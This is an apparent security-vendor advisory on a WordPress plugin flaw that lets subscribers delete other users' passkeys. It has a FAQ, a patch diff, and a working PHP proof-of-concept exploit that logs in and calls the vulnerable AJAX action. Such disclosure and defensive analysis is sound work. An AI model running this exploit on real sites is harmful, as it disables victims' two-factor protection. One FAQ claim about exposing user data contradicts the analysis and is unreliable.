What is CVE-2026-48969?

CVE-2026-48969 is a medium severity vulnerability in the Really Simple Security plugin for WordPress, affecting versions up to and including 9.5.9. It allows authenticated attackers with subscriber-level access to perform unauthorized actions, specifically removing passkeys belonging to other users.

How does this vulnerability work?

The vulnerability arises from a missing capability check in the `remove_passkey_callback()` function. Attackers can send a POST request to delete any user’s passkey without verifying ownership, as the plugin does not check if the current user owns the device or has administrative capabilities.

Who is affected by this vulnerability?

Any WordPress site using the Really Simple Security plugin version 9.5.9 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and look for the Really Simple Security plugin. If the version is 9.5.9 or lower, your site is at risk.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the Really Simple Security plugin to version 9.5.10 or later, where the vulnerable functionality has been removed. Regularly updating all plugins is crucial for maintaining site security.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability requires authentication to exploit, it can still lead to significant issues, such as unauthorized access to sensitive user data.

What is the impact of this vulnerability?

If exploited, an attacker can delete any user’s WebAuthn credentials, effectively disabling two-factor authentication for those users. This undermines the security of the 2FA system, allowing attackers to bypass MFA protections if they also have the user’s password.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to remove a passkey. It illustrates the lack of authorization checks, allowing the attacker to delete passkeys without ownership verification.

What are the broader implications of this vulnerability?

Beyond the immediate risk of unauthorized passkey removal, this vulnerability can lead to a loss of trust in the site’s security measures. If attackers can bypass MFA, it increases the likelihood of account takeovers and further exploits.

Are there any additional steps I should take after patching?

After updating the plugin, review user roles and permissions to ensure that only authorized users have access to sensitive features. Additionally, consider implementing security plugins that monitor user actions and provide alerts for suspicious activities.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all WordPress plugins and themes, implement strong user access controls, and conduct periodic security audits. Staying informed about vulnerabilities in the plugins you use is also essential.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to only those who absolutely need it to reduce the risk of exploitation.

Published : June 21, 2026

CVE-2026-48969: Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) <= 9.5.9 Missing Authorization PoC, Patch Analysis & Rule

CVE ID CVE-2026-48969

Plugin really-simple-ssl

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 9.5.9

Patched Version 9.5.10

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48969:

The vulnerability is a missing authorization check in the Really Simple Security plugin for WordPress, affecting versions up to and including 9.5.9. This allows authenticated attackers with subscriber-level access or above to perform an unauthorized action, specifically removing passkeys (WebAuthn credentials) belonging to other users. The CVSS score of 4.3 indicates a medium severity issue due to the requirement for authentication and the limited scope of impact.

Root Cause: The vulnerability originates from the removal of an access control check in the `remove_passkey_callback()` function within the file `really-simple-ssl/security/wordpress/two-fa/class-rsssl-passkey-list-table.php`. In the vulnerable version, this function is registered via `add_action(‘wp_ajax_remove_passkey’, ‘remove_passkey_callback’)` and checks only the `device_id` parameter passed via POST. Crucially, it loads a `Rsssl_Public_Credential_Resource` instance and calls `delete()` without verifying whether the current user owns that device or has the required administrative capability. The adjacent code in `FeatureManager.php` also shows an early return condition that skips pro features incorrectly, but the core flaw is the missing authorization check in the AJAX handler.

Exploitation: An attacker with a valid WordPress account (subscriber or higher) sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `remove_passkey` and a `device_id` parameter set to any integer representing a passkey stored in the database. The plugin does not verify that the device belongs to the current user, nor does it check for admin capabilities. The attacker can enumerate valid device IDs through other endpoints or simply iterate through integer values. Each request deletes the targeted passkey without any ownership validation.

Patch Analysis: The patch completely removes the `remove_passkey_callback()` function and its associated AJAX action hook from `class-rsssl-passkey-list-table.php`. Instead of fixing the missing capability check, the developers removed the vulnerable endpoint entirely. This eliminates the attack surface for this specific AJAX action. The other changes in the diff (version bumps, asset version updates, and improvements to `FeatureManager.php` and `LicenseService.php`) are unrelated to this vulnerability but may address additional security or functionality concerns.

Impact: An authenticated attacker can delete any passkey (WebAuthn credential) stored for any user on the site. This effectively disables two-factor authentication for targeted users, allowing the attacker to bypass MFA protections if they also compromise the user’s password. The impact is limited to passkey removal; no data extraction or privilege escalation is achieved. However, it undermines the security of the entire 2FA system managed by the plugin.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/really-simple-ssl/assets/features/two-fa/styles.min.asset.php
+++ b/really-simple-ssl/assets/features/two-fa/styles.min.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '7bb42f3f60a5f2420b45');
+<?php return array('dependencies' => array(), 'version' => '0aed0d02c33eaa10bbec');
--- a/really-simple-ssl/core/app/Managers/FeatureManager.php
+++ b/really-simple-ssl/core/app/Managers/FeatureManager.php
@@ -115,23 +115,26 @@
                 continue;
             }

+            $proIsNotActive = ($this->env->getBoolean('plugin.pro') !== true);
             $isProFeature = ($fileInfo->getFilename() === 'Pro');
-            if (!$isProFeature) {
-                $features[] = $fileInfo->getFilename();
-                continue;
-            }
+            $licenseIsInvalid = ($this->license->isValid() !== true);

-            $proIsNotActive = ($this->env->getBoolean('plugin.pro') !== true);
-            if ($proIsNotActive || $this->license->isValid() !== true) {
+            if ($isProFeature && ($proIsNotActive || $licenseIsInvalid)) {
                 continue;
             }

-            foreach (new DirectoryIterator($fileInfo->getPathname()) as $proInfo) {
-                if ($proInfo->isDot() || !$proInfo->isDir()) {
-                    continue;
+
+            if ($fileInfo->getFilename() === 'Pro') {
+                foreach (new DirectoryIterator($fileInfo->getPathname()) as $proInfo) {
+                    if ($proInfo->isDot() || !$proInfo->isDir()) {
+                        continue;
+                    }
+                    $features[] = self::PRO_FEATURE_HANDLE . $proInfo->getFilename();
                 }
-                $features[] = self::PRO_FEATURE_HANDLE . $proInfo->getFilename();
+                continue;
             }
+
+            $features[] = $fileInfo->getFilename();
         }
         return $features;
     }
--- a/really-simple-ssl/core/app/Services/LicenseService.php
+++ b/really-simple-ssl/core/app/Services/LicenseService.php
@@ -15,12 +15,16 @@
      */
     public function isValid(): bool
     {
-        $pluginInstance = RSSSL();
+        if ( ! function_exists( 'RSSSL' ) ) {
+            return false;
+        }
+
+        $plugin = RSSSL();

-        if (! isset($pluginInstance->licensing) || ! is_object($pluginInstance->licensing)) {
+        if ( ! isset( $plugin->licensing ) || ! method_exists( $plugin->licensing, 'license_is_valid' ) ) {
             return false;
         }

-        return $pluginInstance->licensing->license_is_valid();
+        return $plugin->licensing->license_is_valid();
     }
 }
--- a/really-simple-ssl/core/config/env.php
+++ b/really-simple-ssl/core/config/env.php
@@ -11,7 +11,7 @@
 return [
     'plugin' => [
         'name' => 'Really Simple Security',
-        'version' => '9.5.9',
+        'version' => '9.5.10',
         'pro' => false,
         'path' => $pluginRootPath,
         'base_path' => $pluginBaseFile,
--- a/really-simple-ssl/core/vendor/composer/installed.php
+++ b/really-simple-ssl/core/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => '__root__',
         'pretty_version' => 'dev-main',
         'version' => 'dev-main',
-        'reference' => 'f2a89aba02276d7853f3dd1ec84c29d18c7c23f9',
+        'reference' => '03db385d1d980351610744b2cd5e9fbc07e8286e',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         '__root__' => array(
             'pretty_version' => 'dev-main',
             'version' => 'dev-main',
-            'reference' => 'f2a89aba02276d7853f3dd1ec84c29d18c7c23f9',
+            'reference' => '03db385d1d980351610744b2cd5e9fbc07e8286e',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/really-simple-ssl/rlrsssl-really-simple-ssl.php
+++ b/really-simple-ssl/rlrsssl-really-simple-ssl.php
@@ -3,7 +3,7 @@
  * Plugin Name: Really Simple Security
  * Plugin URI: https://really-simple-ssl.com
  * Description: Easily improve site security with WordPress Hardening, Two-Factor Authentication (2FA), Login Protection, Vulnerability Detection and SSL certificate generation.
- * Version: 9.5.9
+ * Version: 9.5.10
  * Requires at least: 6.6
  * Requires PHP: 7.4
  * Author: Really Simple Security
@@ -122,7 +122,7 @@
             define('rsssl_url', plugin_dir_url(__FILE__));
             define('rsssl_path', trailingslashit(plugin_dir_path(__FILE__)));
             define('rsssl_template_path', trailingslashit(plugin_dir_path(__FILE__)).'grid/templates/');
-            define('rsssl_version', '9.5.9');
+            define('rsssl_version', '9.5.10');
             define('rsssl_le_cron_generation_renewal_check', 20);
             define('rsssl_le_manual_generation_renewal_check', 15);
         }
--- a/really-simple-ssl/security/wordpress/two-fa/class-rsssl-passkey-list-table.php
+++ b/really-simple-ssl/security/wordpress/two-fa/class-rsssl-passkey-list-table.php
@@ -1,7 +1,6 @@
 <?php
 namespace  RSSSLSecurityWordPressTwo_Fa;

-use RSSSLProSecurityWordPressPasskeyRsssl_Public_Credential_Resource;
 use WP_List_Table;

 if ( ! class_exists( 'WP_List_Table' ) ) {
@@ -159,27 +158,3 @@
         $list_table->display();
     }
 }
-
-
-add_action('wp_ajax_remove_passkey', 'remove_passkey_callback');
-
-/**
- * Remove passkey callback
- *
- * @return void
- */
-function remove_passkey_callback() {
-    $device_id = isset($_POST['device_id']) ? (int) $_POST['device_id'] : 0;
-
-    if ($device_id > 0) {
-	    $resource = Rsssl_Public_Credential_Resource::get_instance();
-	    if (is_null($resource)) {
-		    wp_send_json_error(['message' => __('Resource not found', 'really-simple-ssl')]);
-		    return;
-	    }
-	    $resource->delete($device_id);
-        wp_send_json_success(['message' => __('Device removed successfully', 'really-simple-ssl')]);
-    } else {
-        wp_send_json_error(['message' => __('Invalid device ID', 'really-simple-ssl')]);
-    }
-}
 No newline at end of file
--- a/really-simple-ssl/settings/build/index.150e63172ef86f413c90.asset.php
+++ b/really-simple-ssl/settings/build/index.150e63172ef86f413c90.asset.php
@@ -0,0 +1 @@
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-components', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices'), 'version' => '150e63172ef86f413c90');
--- a/really-simple-ssl/settings/build/index.db18a1846419792ffa57.asset.php
+++ b/really-simple-ssl/settings/build/index.db18a1846419792ffa57.asset.php
@@ -1 +0,0 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-components', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices'), 'version' => 'db18a1846419792ffa57');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48969 - Really Simple Security <= 9.5.9 - Missing Authorization on passkey removal

// Configuration: set your target WordPress site and credentials
$target_url = 'https://example.com'; // WordPress site URL
$username = 'subscriber';            // Valid account with subscriber level or above
$password = 'password123';           // Password for the account

// Target device ID to remove (can be brute-forced via integers)
$device_id = 1; // Example: first passkey in database

// Step 1: Authenticate and get the WordPress nonce and cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log'      => $username,
    'pwd'      => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Send the AJAX request to remove the passkey
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action'    => 'remove_passkey',
    'device_id' => $device_id
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Display results
if ($http_code == 200) {
    $result = json_decode($response, true);
    if (isset($result['success']) && $result['success'] === true) {
        echo 'Success: Passkey with device_id ' . $device_id . ' was removed.' . PHP_EOL;
        echo 'Message: ' . $result['data']['message'] . PHP_EOL;
    } else {
        echo 'Failed: The server returned an error.' . PHP_EOL;
        if (isset($result['data']['message'])) {
            echo 'Error: ' . $result['data']['message'] . PHP_EOL;
        }
    }
} else {
    echo 'HTTP error: ' . $http_code . PHP_EOL;
}

// Clean up temporary cookie file
if (file_exists('/tmp/cookies.txt')) {
    unlink('/tmp/cookies.txt');
}

Frequently Asked Questions

What is CVE-2026-48969?
Overview of the vulnerability
CVE-2026-48969 is a medium severity vulnerability in the Really Simple Security plugin for WordPress, affecting versions up to and including 9.5.9. It allows authenticated attackers with subscriber-level access to perform unauthorized actions, specifically removing passkeys belonging to other users.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the `remove_passkey_callback()` function. Attackers can send a POST request to delete any user’s passkey without verifying ownership, as the plugin does not check if the current user owns the device or has administrative capabilities.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Really Simple Security plugin version 9.5.9 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and look for the Really Simple Security plugin. If the version is 9.5.9 or lower, your site is at risk.
What should I do to fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Really Simple Security plugin to version 9.5.10 or later, where the vulnerable functionality has been removed. Regularly updating all plugins is crucial for maintaining site security.
What does the CVSS score of 4.3 mean?
Understanding the severity rating
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability requires authentication to exploit, it can still lead to significant issues, such as unauthorized access to sensitive user data.
What is the impact of this vulnerability?
Consequences of exploitation
If exploited, an attacker can delete any user’s WebAuthn credentials, effectively disabling two-factor authentication for those users. This undermines the security of the 2FA system, allowing attackers to bypass MFA protections if they also have the user’s password.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to remove a passkey. It illustrates the lack of authorization checks, allowing the attacker to delete passkeys without ownership verification.
What are the broader implications of this vulnerability?
Potential risks to site security
Beyond the immediate risk of unauthorized passkey removal, this vulnerability can lead to a loss of trust in the site’s security measures. If attackers can bypass MFA, it increases the likelihood of account takeovers and further exploits.
Are there any additional steps I should take after patching?
Post-mitigation recommendations
After updating the plugin, review user roles and permissions to ensure that only authorized users have access to sensitive features. Additionally, consider implementing security plugins that monitor user actions and provide alerts for suspicious activities.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, regularly update all WordPress plugins and themes, implement strong user access controls, and conduct periodic security audits. Staying informed about vulnerabilities in the plugins you use is also essential.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to only those who absolutely need it to reduce the risk of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations